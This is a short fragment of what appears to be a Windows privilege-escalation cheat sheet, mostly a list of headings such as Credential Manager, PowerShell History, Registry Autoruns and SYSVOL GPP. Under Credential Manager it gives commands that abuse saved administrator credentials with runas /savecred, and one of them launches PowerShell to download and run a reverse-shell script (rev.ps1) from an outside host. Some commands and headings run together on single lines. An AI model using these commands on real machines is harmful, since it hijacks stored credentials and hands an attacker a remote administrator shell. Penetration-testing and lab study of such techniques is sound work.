Windows
Unnattended Installation
Windows Credential Manager
cmdkey /listrunas.exe /savecred /user:administrator cmd
// Hosting Nishang shell
runas.exe /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/rev.ps1')"PowerShell History
Process Memory
Registry Autoruns
Enumeration
ACLS
SYSVOL & GPP (MS14-025)
AlwayInstalled
Last updated